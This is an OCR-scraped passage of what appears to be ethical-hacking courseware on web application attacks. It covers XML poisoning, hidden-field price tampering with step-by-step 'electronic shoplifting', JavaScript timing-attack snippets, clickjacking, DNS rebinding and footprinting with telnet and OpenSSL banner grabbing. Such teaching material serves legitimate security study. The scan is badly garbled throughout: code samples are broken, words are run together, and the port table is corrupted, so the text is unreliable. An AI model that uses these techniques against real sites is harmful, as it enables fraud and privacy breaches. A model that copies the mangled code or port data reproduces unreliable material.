‘nttp: org/soap/envelope/">
<Body>
<find_servicegeneric="2.0" xmins="urn:uddi-
org:api_v2"><name>amazon</nane></find_service>
</Body>
</Bnvelop>
HTTP/1.1100 Continue
XML
Response
BYTP/1.1200 OK
Date: Wed,08 Jan 2020 11:05:34 GME
Server: Microsoft-118/7.5
X-Powered-By:
ASP.NET
X-AspNet-Verstion: 1.14322
cache-Control: private, max-age=0
Content-Type: text/xml; charset
Content-Length:1272
"

2><soap:Envelope
org/soap/envelope/">
//scemas.xm1soap.
‘nttp:

//w3.0rg/2008/xn1Schema"><soap
‘ntep: :Body><serviceList
operator="Microsoft
Corporation―
truncated="false" xmlns="urn:uddi-
02g: api_v2"><serviceInfos><eerviceInfo
serviceKey=6adé1201-2b7e-Sabe-c5aa-Scc6ab9de#43"
businessKey="9112358ad-cl2d-
1234-dded-
c8e34e8a0aa6"><name xml:lang="en-us">Amazon
Research
Pane</nane></serviceInfo><ServiceInfo
serviceKey="25638942-2d33-52£3-5896-cl2ca5632abe" businessKey="adeSe?3-abed-
8£52-ca5e~
1253adcefe2a"><nane xnl:lang="en-us">Amazon Web Services
2. 0</name></servicelnfo><serviceInfo

Module4 1789
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
servicekey="adtaSc78-deGf-4562-d45c-aad45d4562ad"businesskey="28ddacd8-déSc~
456a-4562-
xml:
acde456740£5"<name kang="en">Amazon.com
Web
Services</name></serviceInfo><servicernfo
‘ad52a456-4d5£-7dSe-Bdef-cSe6d456ed45"businessKey="45235896-256a-

add55a456£12"><name
xml
:
Lang="en"
>AmazonBookPrice</name></serviceInfo><serviceInfo
servicekey=9acctSad-ASce-4dSc-1234-888cd4562893"
4d22-ed5d-a5Sadc43ad5c"><name
busineseKey="aa45238d-cd55~
xml
:
Lang="en">AnazonBookPrice</nane></serviceInfo></serviceInfos></servicelis
t></soap:Body></
Envelope> soap:

Module4 1790
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
 WebServiceXML Poisoning

WebServiceXML Poisoning
XMLpoisoning is similarto an SQlL attack.It hasa higher
injection success rate i n a web service
framework. Attackersinsert maliciousXML codei n SOAPrequests to perform XML node
manipulation or XML schemapoisoningto generate e rrors i n XML parsinglogic and break
execution logic.Attackers c an manipulate
XML externalentityreferences that can lead to
arbitrary
file or TCPconnection openings,whichcan be exploited
for otherweb service attacks.
XML poisoningenablesattackersto perform a DoS attack and compromise confidential
information.Asweb services are invokedusingXML documents, attackerspoisonthe traffic
betweenthe server and browserapplications bycreatingmaliciousXML documentsto alter
parsingmechanisms suchas SAXand DOM, whichweb applications
useon the server.
XML Request
-<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
‘<FirstName>Jason</FiretName>
<LastName>springfield</LastNane>
<Address>apt
20, 3rd Street</Address>
<Bnail>jasontspringfield.com</Bmail>
<PhoneNunber>6325896325</PhoneNunber>
</CustomerRecord>
PoisonedXML Request
-<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustonerNumber>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2010</CustonerNunber>
<PirstName>Jason</PiretName>
<LastName>springfield</LastNane>
<Address>apt
20, 3rd Street</address>
<Bnai>jason@springfield.com</smail>
<PhoneNunber>6325896325</PhoneNunber>
</CustomerRecord>

Module4 1792
Page tical andCountermensores
Making by Comet
Copyright©
 Hidden Field Manipulation
Attack

HiddenField Manipulation
Attack
Attackerscarry out hiddenfield manipulation attacksagainst e-commerce websites, as most of
thesesiteshavehiddenfieldsi n theirpriceanddiscount In everyclientsession,
specifications.
developers use hiddenfieldsto store clientinformation, includingproduct pricesanddiscount
rates. Duringthedevelopment ofsuchprograms,developers feelthatall their applications
are
safe;however, hackersc an manipulatethe product pricesandeven complete transactionswith
the alteredprices.Whena user makesselectionso n an HTML page,the selectionis typically

as values
to
stored formfield andsent the application
can also store field valuesas hiddenfields,
as an HTTP
or
request(GETPOST).
which are not renderedon the screen bythe
browserbut collectedandsubmittedas parameters during formsubmissions.
HTML.

Attackerscan
examine the HTML codeof the page and change the hidden field valuesto change post
to
the
requests server,
Example
A particular mobilephone mightbe offeredfor $1000 o n an e-commerce website,
but the
hacker, byaltering some ofthe hiddentext i n its pricefield,purchasesit foronly$10.
Suchattacksresultin severe lossesfor websiteowners, even though theymightbe usingthe
latest anti-virus software,firewalls,
1DS,and so on to protect their networksfrom attacks.
Besides financial the owners can alsolosetheir marketcredibility.
losses, An example
of such
codeis given below:
<form method="post" action="page.aspx">
<input type="hidden" value="200,00">
name="PRICE―
Product name: <input type="text name="product―
value="Certifiedhacker Shirt"><br>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Product price: 200.00"><br>

</form>
1 Open
the htmlpage withinan HTMLeditor.
2 Locatethe hiddenfield(e.g.
"<type=hidden value=200.00>"),
name=price
3 Modify value(e.g.
its content toa different "<type=hidden value=2.00>")
name=price
4 Savethehtmlfile locally
andbrowseit
5 Clickthe Buybuttonto perform
electronicshoplifting
via hiddenmanipulation,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Web-basedTiming
Attacks
(©Aweb-basedtiming
such
a passwords retrieve
web the by sensitiv byatackerst o
attack's a typeofsie-channelattack performed
from applications bymeasring response time taken theserver
information

Crose-ite c
tc, nich tach sendcrafted
request

‘chr
take
advantage ofsidechannel
lek oa
browser
by
the
toetimate he i m e taken Brower

Web-basedTiming Attacks

‘A
sensitive information
taken bythe server. Theseattacksexploit
attackperformed
web-basedtimingattackis a typeof side-channel
suchas passwords
fromwebapplications
side-channel
byattackersto retrieve
bymeasuringtheresponsetime
leakageand estimate the amount of
timetakenfor secret key operations.Differenttypesof web-basedtimingattacksinclude
direct.
timingattacks,
cross-sitetimingattacks,andbrowser-based timingattacks.
DirectTiming
Attack
bymeasuringthe approximate
Direct timingattacksare carriedout time taken bythe
server toprocessa POST through
request, whichattackersc an deducethe existenceof a
attackersperform
username. Similarly, characterbycharacterpassword examination
and exploitthe timinginformationto determinethe positionwhere the password
comparison failed. Then,attackersuse this data to determinethe targetuser's
password.
Timing
Cross-site attack
A cross-site timingattack is another type of timingattack,i n whichattackerssend
craftedrequestpackets to thewebsiteusingJavaScript, unlikea directtimingattack,
wherethe attackerhimself/herself passesthe requestto a website.Theattackerthen
analyzes
by
the timeconsumedthe user to downloadthe requested
Forinstance,considera websitehttp://xyz.com
file.
that containstwo separate groupssuch
as /the-prompt/and/the-anonymous-place/,andonlythe group members haveaccess
to thedatafedinto thesegroups.If anyotherpersontries to accessthe group,an error
messageis generated. Now,whena user accesses a n unknownwebsitethat contains

ical andCountermensores
Mackin ©by E-Comel
Copyright
malicious
JavaScript bytheattacker,
injected the attacker
can findout whichgroupthe
user belongs
to andthusviolatehis/her
privacy.

Sample
JavaScript
(url,attack
function
codeusedto perform
getMeasurement callback) (
this

var a Image():
=
new

a.addEventListener(‘error’,
function() {
var

callback
conclude =
performance.now()
(conclude begin)
-

; ;
yD:
var

a.sre
begin
=
=
url;
performance.now()
;
)
( (
//xyz.com/the-prompt/’,
getMeasurement‘http:
getMeasurement‘http:
function (timeTDs) {
function (
//xyz.com/the-anonymous-place’,
(timeTF)
If (timetF> timerDs) {

)
alert (‘The
prompt is alright!’)
;
else {
alert (‘Privacy
breach!");
)
ve
nD:
Timing
Browser-based Attacks
Browser-based timingattacksare sophisticated side-channelattacks.Ratherthan
depending on the unsteadydownload takeadvantage
time, attackers of side-channel
leaksof a browserto estimate the time takenbythe browserto processthe requested
resources. In thiscase,the time estimation begins
immediately
afterthe download
of a
resource andceasesonce the processing is done.
Attackerscan abusedifferentbrowserfunctionalitiesto launchfurther attackssuchas
videoparsingattack,andcache timingattack.
storage
© Video-parsingAttack
Sample
JavaScript
codeusedto perform
thisattack:
function
var p =
getMeasurement
document
(url, callback) {

.createElement (‘video’)
var begin;
ical andCountermensores
Mackin ©by E-Comel
Copyright
 function() (
p.addsventiistener(‘suspend’,

»
begin
=
performance.now()
;
function() {
p.addBventListener(‘error’,

; ;
var conclude performance.now()
=

callback (conclude begin)-

De
p.sre = url;
)
In contrastto cross-sitetimingattacks, here, the estimation time beginswhenthe
event “suspend―
is triggered. The event is usually triggered when the resource
downloading is stopped, as the requested resource is not an intendedvideo; it is
onlya double-or triple-digit KBfile, Theevent is alsotriggered whenthe resource
downloadis completed. Subsequently, the browserattemptsto parse the requested
video. Certainly,
resource as a the files HTML/JSON/... are invalid video formats;
hence,
the browserwill raise an “error―
event. Here,the attackerobservesthe
amount of time the browser takesto processthe resource and generatea n error
event. Singleestimation for every end pointmight not alwaysserve the purpose.
Therefore,attackerstry to accumulateseveraltime estimations andcalculatethe
medianor average.
CacheStorage Timing Attack
The Cache API interface(used to load,fetch,anddelete any responses) offers
complete cache(memory) to the developers. Loading resources i n the disktakes
some amount oftime based o n the resource size. If attackers can estimate the time
taken bythe browserto perform this task,theycan measure the corresponding
response size.

‘Sample
JavaScriptcodeusedto perform thisattack:
function
fetch
getMeasurement
(url, (mode:“no-cors―,
(url,
callback)
credentials
{

.then
“include―}) (function (resp) (
setTimeout (function() (
caches. open(‘attackerfile’)
var
begin performance.now()
=
. ; then (function (cache)(

(
cache. put (newrequest ‘nyfoo’),
resp.clone()).then(function() {
var conclude
callback = performance.now()
(conclude -
begin);

ical andCountermensores
Mackin ©by E-Comel
Copyright
 »

»
}, 2000)
;
)
After estimating
or measuringthe processing time using the abovementionedtechniques,
attackerscan launch further attacks such as brute-forceattacks to obtain complete
information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 MarioNetAttack

or
codeinside
‘malous thebrowser,andthe
Infection perseven afterlosing browsing
whichfection hasspread Inco
tacks register
andactinatea
Service
Worker
ese

pester
the
{When victimbrowses
thatwebsite,
nthe background
Service
=

100s, ck rau, anddetibutedpassword

MarioNet Attack
MarioNet is a browser-based
attackthat runs maliciouscodeinsidethe browser,
and the
infection
persistseven afterclosing
or browsing awayfromthe maliciouswebpagethrough
whichthe infectionhasspread. Most of the latestweb browserssupporta new API called
ServiceWorkersthatallowsthe website
to isolateoperationsthatrender
the webpageUI from
intensive computational
tasksto avoid freezing
of the Ul when largeamounts of data are
processed.
Attackers and activate the ServiceWorkers
register AP!through bythem,
a websitecontrolled
Whenthe victim browsesthat website, the ServiceWorkersAPIautomatically and it
activates,
in the background
can run persistently browsing
even whenthe useris not actively thewebsite.
To keepthe ServiceWorkersAPI alive,attackersabusethe ServiceWorkersSyncManager
interface.
Therefore,
MarioNetcan resist any tab crashesand powerfailures, increasingthe attacker's
potential
to attackthe browser.MarioNetleverages the abilitiesof JavaScript
and depends on
previously
available
HTMLSAPIs.It can beusedto create a botnetandlaunch
othermalicious
attackssuchas cryptojacking, DDoS, clickfraud,
anddistributedpassword cracking.
Furthermore,thisattackallowsattackersto inject maliciouscodeinto high-traffic
websitesfor a
short period,retrieve sensitive information andthen controlthe
suchas user credentials,
abusedbrowsers froma centralserver.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebBrowser

Blocking
Extensions
WebServer

$
Webooee
Sprenderng
Serc
omer
| Oe
comma

RemoteC&C

18.36:tustationofMarioNet
Figure attack

Module4 1800
Page tical MakingandCountermensores
by Comet
Copyright©
 Attack
Clickjacking

bytricking
thevictim

any
cing on
malicious
webpageelement
that mec

trusted webpage
‘ny

9 °
attackers
leverage,
Clkacking sng ecige
i s ta
bts tend —

varetyofstack vectorsnd ti

Sy iam or proper

Attack
Clickjacking
AAclickjackingattackis performed whenthe targetwebsiteis loadedinto an iframeelement
that is masked with a webpageelementthat appearslegitimate. Theattackerperforms this
attackbytricking the victim into clickingon any maliciousweb pageelementthat is placed
transparently on the top of any trusted web page. Clickjacking is not a singletechnique;
attackersleverage various attack vectors and techniques called Ul redressattacks.They
perform suchattacksbyexploiting the vulnerabilitiescausedbyHTML iframesor improper
configuration of the X-Frame-Options header.There are severalvariations of clickjacking
attacks and
suchas likejackingcursorjacking.
website
themalicious to the victim through
To perform theseattacks, attackerssenda link to
email,socialmedia,or anyothermedia,
In clickjacking,
the attackerloadsthe targetwebsiteinsidea low opacityiframe.Then, the
attacker designsa pagesuchthat all the clickableitems suchas buttonsare positioned exactly
as on the selectedtargetwebsite,Now, the victim Is tricked into clickingon the invisible
controlsor the deceptive UI elementsthat automatically triggervarious maliciousactions such
as injectingmalware, retrieving maliciousweb pages,retrieving sensitive informationsuchas
creditcarddetails,transferring moneyfromthevictim'saccount,andbuying productsonline,
various clickjacking
‘The techniques
employed byattackers
are listedbelow:
=
Complete overlay:
transparent In this technique,
the transparent,legitimate
pageor
designed
tool page is overlaidon the previously maliciouspage.Then,
it is loadedinto
an invisible

Cropping:
iframeandthehigher
In this technique,
z-index
is for
valueassigned positioning
it on top.
onlythe selectedcontrolsfrom the transparent
pageare
overlaid.Thistechnique
depends on the goalof the attackand may involvemasking
and text labelswith falseinformation,
buttonswith hyperlinks changing the button

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and completely
labelswith wrong commands, coveringthe legitimate
page with
misleading
informationwhileexposingonlyone original
button.
Hidden overlay: In this technique, the attacker creates an iframe of 1x1 pixels
containing maliciouscontent placed secretlyunderthe mouse cursor. Whenthe user
clickso n this cursor, it will be registered
on the maliciouspagealthough the malicious
content is concealed bythe cursor.
Clickevent dropping: Thistechnique can completely hide a maliciouspage behinda
legitimatepage.It can alsobeusedto
setthe CSS
none. Thiscan cause clickevents to “drop―
onlythe maliciouspage.
registers
pointer-events
through
property
the legitimate
of the topto
maskedpageand

Rapid content replacement: In this technique,the targeted controlsare coveredby

overlays
‘opaque that are removedonlyfor a moment for registering a click.Anattacker
usingthistechnique
the webpage. toneeds accurately thetime takenbythevictim to clickon
predict

Attacker tack overlays

Attacker’s
Website

smolicous
webpageelements

Vitis browser
opensthe target
ik va eral

Viti chs logitinate

Urelement andgets

echiochod
14.37tlstraton of cklacking
Figure attack
Victim'sBrowser

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSRebinding
Attack

*
cokeraete
(niin Pele’
Secu constrains,
2a=~
et
ae
te communicate or
request tloaldomains make
arbitrary
wiod||
ratomuseeaee conan

fermen
twatnibeONSterer
tomeceiedneeream

conaledoytne hen
Theattacker configures
the
fa
septa
eae

lthveryshortTL values
to avoid
—
caching

DNSRebinding
Attack
Attackers use the DNSrebinding techniqueto bypass the same-origin policy'ssecurity
constraints, allowingthemalicious webpageto communicate withor makearbitrary requests
to localdomains.Forinstance, if a clientis working he/she
for an organization, mostly u sesthe
internal or private network.Anyexternalsresources cannotbe accessed insidethat private
networkdue to the same-originpolicy (SOP).Hence, attackerscannot directly
communicate
with the localnetworkdue to restrictions i n the SOP.Therefore, theyuse the DNSrebinding
technique to circumvent thisSOP security implementation,
HowDNSRebinding
Works
‘Anattackercreates a maliciouswebsitewith the domain name certifiedhacker.com and
registers it with the DNSserver controlledbyhim/her.
Now,theattackerconfigures the ONS
server to sendDNSresponseswith very shortTTLvaluesto avoid caching of the responses.
Then,the attackerbegins his/her with the HTTPserver that contains the
intendedoperation
websitehttp://certifiedhacker.com.
malicious
Whenthe victim opens the malicious website,
the attacker'sDNSserver sendsthe IP Addressof
websitehttp://certifiedhacker.com.
the HTTPserver that hoststheattacker-controlled Theweb
server responds with a pagethat runs JavaScript browser.Then,
code i n the victim’s the
JavaScript code accesses the website on the domain http://certfiedhacker.com to get
additionalresources from http://certfiedhacker.com/secret.html.Whenthe browserruns the
JavaScript,it makesa DNSrequest forthedomain(owing to theshortTTLconfiguration), but
the attacker-controlled DNSserver responds with a new IP. For instance, if the attacker-
controlledDNSserver responds withthe privateor internalIP of xyz.com,thevictim'sbrowser
toadshttp://xyz.com/secret.htmlandnot http://certifiedhacker.com/secret.htm!
successfully
by
bypassingthe SOP.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Application
‘Web Concepts Hacking
Methodology
a

Web
Application API,
Webhoo
Threats
Web

———_—_=[[_
:
»-_—
= — f°
Web Application
Hacking
Methodology EH
¢
DEctor we nrastctare LE) managemen
21 session Mechanism

Aly

bypass
We Appitons

Chen SideControls
Perfocm
eck
Injen Atacs

AppatonLogeas

tack Athalon Mecantm tack shared

Environments

tack Authorization
Schemes ‘attack
Database
Connectivity

stack AccessControls _Attack

Web
App Client

Ee
FE) nese
en
serves

SR
Web Application
Hacking
Methodology
Theprevious section discussed
the securitypostureof web applications byanalyzing various
typesof threats/attacks in use. Attackersperform
currently theseattacksusinga detailed
processcalledthe hacking methodology. Thissection will describethe stepsof the hacking
methodology,explaining howattackerstargetwebapplications.

Module4 1805
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
Attackers use thewebapplication hacking
methodology
to gainknowledge of a particular
web
application to compromise it successfully.
Thismethodology
allowsthem to planeachstepi n
detailto increasetheirchances ofsuccessfully
hacking
the application.
Underthismethodology,
theydo the following
to collectdetailedinformationabout various resources neededto run or

access thewebapplication
Footprint webinfrastructure
=
Analyze
webapplications

Bypass
=
client-sidecontrols
Attackauthenticationmechanisms

authorization
‘Attack
Attackaccesscontrols
schemes

‘Attack
session managementmechanisms
Performinjectionattacks
‘Attack logic
application flaws
shared
‘Attack environments
Attackdatabaseconnectivity
Attack

Attack
webapplication
web services
clients
If hackersdo not use thisprocessandtryto exploitthewebapplication directly,
theirchances
of failureincreases. Thefollowingphasesof thismodulewill provide
a detailedexplanation
of
howattackers deriveinformation
abouttheseresources.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebInfrastructure
Footprint
©Webifastructure
Wert vulnerable footprinting
we
the fist te i n
webapplications
application i thlps
hacking attackers
to
select veins

]
Web Infrastructure:ServerDiscovery
Footprint CEH
|G Serverdiscovery
evesinformation
aboutserver locations
an
ensures
is the
thatthetarget
server Ive on Internet

Ns
Interrogation
|
NS
§
maropson
pysns tone Toe
s/osh
s on ©ote ot mon

pon
|
scoot
thevener
Penson

Module4 1807
Page ical andCountermensores
Mackin Copyright E-Comel
©
by
 WebInfrastructure:ServiceDiscovery
Footprint
the targetwebsever to
Sean that we s e rv e rs use forferent series

Youcan use tolesucha Nmap,NeScanToosPro and Sandeat

ov ringseries

WebInfrastructure:ServerIdentification/
Footprint
BannerGrabbing

Module4 1808
Page tical MakingandCountermensores
Copyright©
Comet
by
 FootprintWebInfrastructure:
Site
and Proxies on Target Detecting
AppWeb
EH Firewalls

Detecting
Proxies
Detecting WebApplication
Firewalls

Web Infrastructure: Hidden

Footprint Content Discovery
(©cover ay

‘oteaion
hden
content
fnconaty
nd tt ee OWASP
Zed
Atack Proxy

Web | AWtackerDieected
Spidering
Spidering/Grawing

Module4 1809
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
 WebInfrastructure:DetectLoadBalancers CEH
Footprint

Footprint
Web Infrastructure
Footprinting of gathering
is the process complete
information
abouta system
andall its related
components, as well as how they work. Theweb infrastructureof a web application is the
arrangement bywhichit connects to other systems,servers, and so on i n the network.Web
infrastructurefootprintingis the first stepi n web application
hacking;it helps attackersto
selectvictims and identify vulnerable web applications. Attackersfootprint the web
infrastructureto knowhowthe web application connectswith its peersandthe technologies
it
Uses and to find vulnerabilitiesi n specific
partsof the web application architecture.These
vulnerabilities
Footprinting
can
help
attackers
exploit andgainunauthorized
to
a ccess theweb application,
thewebinfrastructureallowsan attackerto engage i n the following tasks:
=
ServerDiscovery:Attackersattemptto discoverthe physical servers that host web
applications,
usingtechniques suchas Whoislookup, DNSinterrogation, portscanning,
andso on,

ServiceDiscovery: Attackerscan discoverthe services running on web servers to

determinewhethertheycan use some of them as attackpaths for hacking
the web
application.Thisprocedure also provides
web application informationsuchas storage
location,informationaboutthe machines runningthe services,andthe networkusage
and protocols involved.Attackerscan use toolssuchas Nmap,NetScanTools Pro, and

onports
othersto findservices running open andexploit
ServerIdentification:Attackersuse bannergrabbing
them,
to obtain the server banners,
which helpto identify the makeand version of the web server software,Other

that
LocalIdentity:
the
information this technique providesincludes following:
informationsuchas the locationof the server andthe Origin-Host.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 LocalAddresses: that the server uses forsending
the localIP addresses Diameter
Exchange
Capability messages(CER/CEA messages),including
the server identity,
‘capabilities,
andother information
suchas protocol
version number andsupported
Diameter
applications.
Self-Names: thisfield specifies
all the realmsthat the server considersas localand
sentas
no
treats all therequests for them
HiddenContent Discovery:
Footprinting
realmrequests.
alsoallowsattackersto extract content and
functionality
that is not directly
linkedto or reachable
fromthemain visiblecontent.
LoadBalancersDetection: Attackers can detect load balancers of the target
alongwith their real IP addresses
organization to identify
servers exposedover the
Internet,
ServerDiscovery
To footprint first,you need to discoveractive Internet servers. Three
a web infrastructure,
techniques,
namely
Whoislookup, andportscanning,help
DNSinterrogation, i n discovering
the
active servers andtheirassociated
information
=
WhoisLookup
Whoislookup toolsallowyou to gather
informationabout a domainwith the helpof
DNSand Whoisqueries.They provide
informationabout the IP addressof the web
toolsproduce
server and DNSnames. These resultsi n the formof an HTML report.
Usethefollowing
toolsto perform lookup:
Whois
(httpsi//www.netcraft.com)
Netcraft
(http://whois.domaintools.com)
WHOISLookup
(https://www.tamos.com)
SmartWhois
sabsoft.com)
BatchIPConverter (http://www.
DNSInterrogation
Organizations
use DNSinterrogation, whichis a distributeddatabase,to connect their IP

addresses
with their respective
connected,
launching
hostnames andvice versa. Whenthe DNSis improperly
then it is very easyto exploit
an attackon a target
it and gather
It provides
organization.
the informationrequired for
informationaboutthe location
of
type
and servers.
Usethe following
toolsto perform
DNSinterrogation:
© Toolset(https://tools.dnsstuff.com)
Professional
0 (https://network-tools.com)
DNSRecords
0 (https://github.com)
DNSRecon
(https://centralops.net)
DomainDossier

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Port Scanning
Port scanningis the processof scanningsystemportsto recognizeopen ones. It
to connect to a particular
attempts set of TCPor to find out the service that
UDP ports
a n unusedopen port,they
existson the server. If attackersrecognize can exploit it to
intrudeinto the system.
Usethefollowing
toolsto perform
portscanning:
(htps://nmop.org)
Nmap
Pro(https://www.netscantools.com)
NetScanTools
‘Advanced (https://www.advanced-port-scanner.com)
Port Scanner
©
(http://www.
Hping hping.ora)
ServiceDiscovery
the webinfrastructureprovides
Footprinting dataaboutthe services offered,
suchas exchange
of data,path
and encryption and protocols
of transmission, deployed. Scanthe target
web
server to identifythe common portsthat it uses for differentservices. Afterfindingthese
services, attackerscan compromise them to exploit the web infrastructurethat runs the
application. services act as attackpaths
The identified forwebapplication hacking.
Thetable
belowlistscommon portsusedbywebservers andtheir respective
HTTPservices:

Port
80
Typical
WorldWideWebstandard
HTTPServices
port
a AlternateW WW

88 Kerberos
RemoteNetwork
ServerSystem
SSL(HTTPS)
RemoteShell

‘Open
Directory (ODProxy)
Proxy
IBMRMC(Remote and Control)
monitoring Protocol
SecureInternetLive Conferencing
(SILC)

NETCONF
for
NETCONF SOAP
over HTTPS.

for SOAP
over BEEP.
IBMWebsphere
administrationclient
RemoteHTTPSmanagementfor firewalldevicesrunning
‘embedded
CheckPointVPN-1software
RemoteWebWorkplace,
Microsoft a featureofWindows

Business
Server
‘Small

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1433 MSSQL
Server
134 MSSQL
Monitor
1527 OracleNet Services
2301 ‘Compaq
insight
Manager
2381 ‘Compaq
insight
Manager
over SSL

2638 Anywhere
SQL DatabaseServer
za “Microsoft
Application
CenterRemotemanagement
7001 BEAWebLogic
7002 BEAWebLogic
over SSL

Sun
‘3000Webover
7070

Alternate
Java Server
webserver or
SSL.
webcache
8001 Alternateweb server or management

‘80059090
‘Apache
Tomcat
SunJavaWebServeradminmodule

10000 Netscape
Administratorinterface
deplaying
Table14.1:Table HTPServices
©
Tools
>
used
service
Nmap
for discovery

Source:https://nmap.org
Nmap i s a multi-platform, multi-purpose application usedto perform
footprinting
of
ports,services,operating etc. It is usedfor networkdiscovery
systems, andsecurity
auditing, It is usefulfortaskssuchas networkinventory, managingservice upgrade
schedules,
and
monitoring
host or service uptime.

14.39Screenshot
Figure ofNmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
 service discovery
Someadditional toolsare as follows:
Pro(httns://www.netscantools.com)
NetScanTools
SandeatBrowser(http://wwwsyhunt.com)
ServerIdentification/Banner
Grabbing
Bannergrabbing is a footprinting
technique usedbya hacker to obtainsensitive information
about a target.An attackerestablishesa connection with the targetand sendsa pseudo-
request to it. Thetargetthen repliesto the requestwith a bannermessage that contains
sensitive informationrequiredbytheattackerto furtherpenetratethe target.
Through
bannergrabbing, the name and/or
attackersidentify version of a server, operating
or application.
system, They analyze
the server responseheaderfieldto identify the make,
model,
and version of the web server software.Thisinformationhelps
them to selectthe
appropriate
exploitsdatabases
How an attacker
attack server
fromvulnerability to the web andits applications.
can use telnet to establisha connection and gain bannerinformation
of a
is demonstrated
target below:
=

issues
Theattacker thecommand telnet moviescope.com 80 i n his/her
commandpromptto establisha telnet connection withthe targetmachine,
machine's

words,
specify
either ofa
addresstarget
Note: Theattackercan

he/she
ofathe IP

if the attackerenteredan IPaddress,

machineor the URL
website.In bothcases,the attackerobtainsbannerinformation
of the target.In other
receives bannerinformationof the
target machine; if he/sheenters the URLof a website,he/shereceives banner
informationof theweb server that hoststhewebsite,
Syntax:
C:\telnet <Website domain or IP address> 80

oftenetcommand usage
14.40:Anexample
Figure
Afterestablishing
the connection,the attackerreceives the prompt:doesnot display
any
information
Now,the attackerwill pressthe Esckey,whichreturns thebannermessagethat displays
informationaboutthetargetserver along withsome miscellaneousinformation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Serveridentified
as nginx

helps
This information attackersfind waysto exploittargetweb servers andtheir
applications.
Grabbing
Bannersfrom SSLServices
Toolssuchas TelnetandNetcatare capable of grabbing
banners of web servers over
onlya n HTTPconnection. Attackerscannot grabbannersover an SSLconnection using
the same techniquesas thoseusedforgrabbing bannersover HTTPconnections.They
can use tools suchas OpenSSL to grabbannerson web servers over an encrypted
(HTTPS/SSL)
connection.
Attackersperform
the following
stepsto grab
bannersover an SSL.
connection:
©. Step1:
OpenSSL
Install
Opensst
is a cryptography
toolkit implementing (SSL)
the SecureSocketsLayer and
Transport (TLS)
LayerSecurity network protocols
andthe relatedcryptography
standardsrequired
bythem,
Ieis availableat hetps://Awww.openssl.org
Step2: Navigate
3: inthe
to OpenSSL terminal

Step Runthecommand:s_client-host <target website> -port 443

Replace domainname. Here,443 is the
the <target website> with your target’s
defaultSSLport.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 14.42:
Figure xampleof OpenSSL
command

©. Step GET/HTTP/1.0

4: Type andpressenter to getthe server information.
The informationdisplayed
indicatesthat OpenSSL
identifiesthe server used by
certifiedhacker.com
as Apache.

1443:Resultof OpenssL.
Figure bannerrabng

bannergrabbing
Someadditional toolsare asfollows:
+
Netcat(http://netcat
sourceforge.net)
#
IDServe(https://www.gre.com)
+
Netcraft(https:/mww.netcraft.com)
Detecting
WebAppFirewallsandProxieson Target
Site
Whilefootprinting
thewebinfrastructure, must discoverthe web application
attackers firewall
of the targetsite to knowthe securitymeasures employed.
andproxy settings
Detecting Proxies
‘Some use proxy servers i n front of their web servers to makethem
organizations
untraceable.Therefore,
whenattackerstry to trace the target's IP address,
whichis

ical andCountermensores
Mackin ©by E-Comel
Copyright
hiddenbehinda proxy,usingfootprinting the attempt wouldprovide
techniques, its
andnot its legitimate
proxy IP address address.
Determine whetheryour target
site is through
routingyour requests proxyservers. To
knowwhether
Thetrace
@
web server is behinda proxy,attackersc an use the
commandsendsa requestto the web server, asking
trace

it to sendbackthe
command.

request. Attackersplace the trace commandin HTTP/1.1.Ifthewebserver is present

behinda proxy server andwhenan attackersendsa request using the trace command,
the proxymodifies thisrequest(byadding andforwards
some headers) i t to the target
web server. Therefore, whentheweb server bouncesbackthe request to theattacker's
machine, the attackercompares andanalyzes
bothrequests thechanges madeto it by
the proxy server.

Waa" ,*X-Forwarded-For:", *Proxy-Connectica

TRACE / HPTE/1.1

HITP/1.2 300 ox

Date: Sat, 04 Jan2020 15:25:15

Content-Length: «0
TRACE / HPTE/1.1
ont
18.44;
Figure Result
of TRACE
command

Web
Detecting Application
Webapplication
Firewalls
firewalls(WAFs) are securitydevicesdeployed betweenthe clientand
theserver. Thesedevicesare likeIPSthatprovide securityforwebapplications
againsta
wide range of attacks.They traffic,
monitor web server trafficandblockmalicious thus
safeguarding
web
applications
Attackersuse differenttechniques
fromattacks.
to detect web applicationfirewalls in the web
infrastructure.One of thesetechniques involvesexaminingthe cookiesbecausea few
WAFsaddtheir own cookies during communication.Attackerscan view the
client-server
HTTPrequest
‘Another
cookieto observethe presenceof WAF.
methodfor detectinga WAF is byanalyzing
a
the HTTP headerrequest. Most
thus,the server response
firewallsedit HTTPheaderrequests; varies. Hence,an attacker
sendsa requestto a web server, and whenthe server responds to the request,the
response betrays of theweb application
the presence firewall
Attackersusevarious toolssuchas WAFWOOF
to detectthe presence
of a WAFi n front
of a webserver that
hoststhetargetwebsite,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WAFWOOF
Source:https://github.com
WAFWOOF allowsone to identify
and fingerprint a website.It
WAFs protecting
detects
a WAFat anydomain bylooking
forthe following:
*

*
Cookies

Server
cloaking
*

*
Drop
action

Pre-built-in
rules
* codes
Response

Faure16.45: of WAFWOOF
Sereenshot
Youcan alsousethe toolslistedbelowto detectWAFS
in the targetwebinfrastructure:
© SHIELOFY FirewallDetector(https://shielafy.io)
WebApplication

©
‘WhatWaf
(https://github.com)
(https://nmap.ora)
Nmap
HiddenContentDiscovery
Hidden content and functionality not reachablefrom the main visible content can be
discovered
backup
to exploit

archivescontaining
user privileges

snapshots
within the application.
copiesof live files,configurationfiles,and logfiles containing to
Thisallowsan attacker recover
sensitive data,backup
of fileswithin the web root,new functionalitythat is not linked
to the main application, etc

